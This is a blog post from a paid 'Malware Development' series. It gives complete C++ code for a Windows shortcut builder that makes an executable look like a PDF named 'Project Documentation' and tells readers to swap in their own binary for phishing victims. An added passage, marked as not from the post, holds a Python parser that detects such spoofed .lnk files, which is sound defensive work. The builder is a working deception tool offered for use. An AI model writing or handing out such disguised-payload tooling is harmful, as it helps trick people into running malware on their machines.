PDF Icon File Spoofing

S12 - H4CK
5 min read · Jul 8, 2024

Welcome to my new Malware Development post. In this one I want to show you a simple but useful technique to trick the victim into clicking on a "PDF" file that actually executes our binary.

An offensive technique like this is useful to a malware developer or pentester in cases like the following:

Imagine you're a pentester hired to test the security of a company's internal network. You need to see whether employees can be tricked into opening malicious files. By disguising your payload as a harmless-looking PDF, you can send it in a phishing email or place it in a shared folder. If an employee clicks on it, your binary runs on their system, revealing how vulnerable the company's security really is.

Our Malware Development Text Modules subscription is finally here! Dive deep into Windows OS malware techniques, from beginner to advanced, all in C++.

  • New module every 15 days
  • Over 45 minutes of reading time per module
  • Starting at just $5/month

Here you also have my first course, which is basically an introduction to Windows Malware Development using C++. It's available from $15.

Code

The GitHub repository linked in this post contains the code that creates the link file, together with the PDF icon (pdfIcon.ico) it uses:

    #include <windows.h>
    #include <shlobj.h>
    #include <atlbase.h>
    #include <string>
    #include <iostream>

    // Creates a .lnk at shortcutPath that launches targetPath and is displayed by
    // Explorer with icon index 0 of iconPath. Returns true when the file was written.
    bool CreateShortcut(const std::wstring& targetPath, const std::wstring& shortcutPath, const std::wstring& iconPath)
    {
        HRESULT hres = CoInitialize(NULL);
        if (FAILED(hres))
            return false;

        {
            // Explicit Unicode interface so the code does not depend on the UNICODE macro
            CComPtr<IShellLinkW> psl;
            hres = CoCreateInstance(CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, IID_IShellLinkW, (LPVOID*)&psl);
            if (SUCCEEDED(hres))
            {
                // What runs when the user double-clicks the "PDF"
                psl->SetPath(targetPath.c_str());

                // What the user sees: the PDF icon shipped next to this builder
                psl->SetIconLocation(iconPath.c_str(), 0);

                CComPtr<IPersistFile> ppf;
                hres = psl->QueryInterface(IID_IPersistFile, (LPVOID*)&ppf);
                if (SUCCEEDED(hres))
                {
                    // Serialise the link to disk; TRUE marks the saved copy as the current one
                    hres = ppf->Save(shortcutPath.c_str(), TRUE);
                }
            }
        } // CComPtr destructors release both COM objects before CoUninitialize

        CoUninitialize();
        return SUCCEEDED(hres);
    }

    int main()
    {
        std::wstring targetPath = L"C:\\Windows\\System32\\calc.exe";
        std::wstring shortcutPath = L"C:\\Users\\b\\Desktop\\Project Documentation.lnk";

        // The icon lives in the same directory as this executable: take the
        // running module's path and strip the file name (wide API, no lossy narrowing)
        wchar_t buffer[MAX_PATH];
        GetModuleFileNameW(NULL, buffer, MAX_PATH);
        std::wstring path(buffer);
        std::wstring::size_type pos = path.find_last_of(L"\\/");
        path = path.substr(0, pos);
        std::wstring iconPath = path + L"\\pdfIcon.ico";

        return CreateShortcut(targetPath, shortcutPath, iconPath) ? 0 : 1;
    }

This C++ program creates a Windows shortcut (.lnk file) on the desktop. The shortcut points to a target executable (in this case, calc.exe) and uses a custom icon. The trick works because Explorer never displays the .lnk extension, whatever the "hide extensions" setting, so the file shows up as "Project Documentation" with a PDF icon; only the small shortcut-arrow overlay, the "Shortcut" entry in the Type column and the Target field of the Properties dialog give it away.

Breakdown of the Code

  1. Includes:
  • The program includes the Windows API, the Shell API (shlobj.h), the ATL smart pointer CComPtr (atlbase.h), and the standard C++ string and stream headers.
  2. CreateShortcut Function:
  • This function takes three parameters: targetPath, shortcutPath, and iconPath. It creates a shortcut that points to targetPath and saves it as shortcutPath with the icon taken from iconPath.
  3. COM Initialization:
  • The program initializes the COM library so the shell link object can be created.
  4. Create IShellLink Instance:
  • It creates a ShellLink object (IShellLink), which is used to set the properties of the shortcut.
  5. Set Shortcut Properties:
  • If the ShellLink object is successfully created, the program sets the target path and icon location for the shortcut.
  • It uses the IPersistFile interface to save the shortcut to disk.
  6. COM Uninitialization:
  • The program uninitializes the COM library after the operations are completed.
  7. Return Status:
  • The function returns true if the shortcut was created successfully, otherwise false.
  8. Main Function:
  • The main function defines the targetPath (the path to the calculator executable), shortcutPath (the path where the shortcut will be saved), and determines the iconPath (the path to the icon file).
  • It retrieves the current executable's path and constructs the path to the icon file in the same directory.
  • The function calls CreateShortcut with the specified paths and returns 0 on success, 1 on failure.
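The other side of the same file format is how a defender spots this shortcut in a mailbox or a shared folder. The following is an added example, not code from the post or its repository: a small parser for the Shell Link binary format (MS-SHLLINK) that pulls the local target path out of the LinkInfo structure and the ICON_LOCATION string out of StringData, then flags the two tells this technique relies on, an executable target displayed with an icon borrowed from a separate .ico file, and a visible file name that imitates a document once Explorer hides the .lnk extension. The sample .lnk bytes are constructed in build_lnk purely so the check runs offline; the calc.exe and pdfIcon.ico paths mirror the builder above and are assumptions, not data from a real shortcut.

```python
import ntpath
import struct

# ShellLinkHeader constants from the MS-SHLLINK specification
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

EXEC_EXTENSIONS = {".exe", ".com", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".msi"}
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def parse_lnk(data: bytes) -> dict:
    """Extract the local target path, icon index and StringData fields from a .lnk image."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "icon_index": struct.unpack_from("<i", data, 56)[0],
            "local_base_path": None}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip the IDList; this check relies on LinkInfo/StringData
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        link_info_size, _hdr_size, li_flags = struct.unpack_from("<III", data, pos)
        if li_flags & 0x1:                   # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = pos + struct.unpack_from("<I", data, pos + 16)[0]
            info["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252")
        pos += link_info_size

    def read_string() -> str:
        # StringData item: CountCharacters (uint16) followed by the characters, no terminator
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        info[key] = read_string() if flags & flag else None
    return info


def spoof_indicators(info: dict, lnk_filename: str = "") -> list:
    """Return human-readable reasons this shortcut looks like an icon/extension spoof."""
    findings = []
    target = info.get("local_base_path") or info.get("relative_path") or ""
    icon = info.get("icon_location") or ""
    if ntpath.splitext(target)[1].lower() in EXEC_EXTENSIONS and icon:
        if ntpath.splitext(icon)[1].lower() == ".ico":
            findings.append(f"executable target {target} is displayed with a standalone icon file {icon}")
        elif ntpath.basename(icon).lower() != ntpath.basename(target).lower():
            findings.append(f"executable target {target} borrows its icon from {icon} (index {info['icon_index']})")
    if lnk_filename.lower().endswith(".lnk"):
        shown = lnk_filename[:-4]            # Explorer never shows .lnk, so this is the visible name
        if ntpath.splitext(shown)[1].lower() in DOC_EXTENSIONS:
            findings.append(f"displayed name '{shown}' imitates a document")
    return findings


def build_lnk(target: str, icon: str, icon_index: int = 0) -> bytes:
    """Constructed test sample: minimal .lnk with a LinkInfo local path and an ICON_LOCATION string."""
    flags = HAS_LINK_INFO | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    base = target.encode("cp1252") + b"\x00"
    base_off = 0x1C + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"
    icon_sd = struct.pack("<H", len(icon)) + icon.encode("utf-16-le")
    return header + link_info + icon_sd + b"\x00\x00\x00\x00"      # TerminalBlock closes ExtraData


if __name__ == "__main__":
    sample = build_lnk(r"C:\Windows\System32\calc.exe", r"C:\Users\b\Desktop\pdfIcon.ico")
    for line in spoof_indicators(parse_lnk(sample), "Project Documentation.pdf.lnk"):
        print("[!]", line)
```

Treat the output as triage signals rather than a verdict: legitimate installers do set icons from a DLL other than the target, so the "borrows its icon" case needs a human look, while an executable target paired with a loose .ico file or a document-like display name is much rarer in benign shortcuts. Real-world malicious links often carry the target only in the LinkTargetIDList or an EnvironmentVariableDataBlock, which this parser deliberately skips; extend it before relying on it in a pipeline.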

Usage

To use this tool you only need to change these two paths in main(), targetPath (the binary to run) and shortcutPath (where the fake "PDF" is written), and recompile the C++ application:

Result

Desktop:

File Explorer:

Properties:

Conclusions

In this post, we’ve explored the technique of PDF Icon File Spoofing, a crafty method used to deceive users into executing a malicious binary by disguising it as a harmless PDF file. By manipulating the file’s appearance, we can significantly increase the chances of an unsuspecting user clicking on it, thereby compromising their system.

This method can be particularly effective for penetration testers or malware developers looking to assess or exploit the security vulnerabilities of a target system. As demonstrated in our example scenario, disguising malware as a PDF and distributing it via phishing emails or shared folders can help identify security weaknesses in an organization’s internal network.

The provided C++ code illustrates how to create a Windows shortcut (.lnk file) with a custom icon, pointing to a specified target executable. By understanding and applying this technique, you can see firsthand how seemingly benign files can be leveraged to gain unauthorized access.

To further your skills in malware development, consider subscribing to our Malware Development Text Modules. With a new module every 15 days, you can dive deep into Windows OS malware techniques, ranging from beginner to advanced levels, all in C++. Additionally, our introductory course on Windows Malware Development using C++ is available, offering comprehensive insights into advanced malware techniques.

For practical implementation, the GitHub repository linked in this post provides the complete code for creating a PDF icon file type spoofer. By modifying and recompiling this code, you can tailor the tool to suit specific use cases and targets.

Get ready to unlock the secrets of ethical malware development with our unique academy! We’re taking a different path through the world of cybersecurity, and here’s why you should jump on board:

Thanks for reading :)

S12.
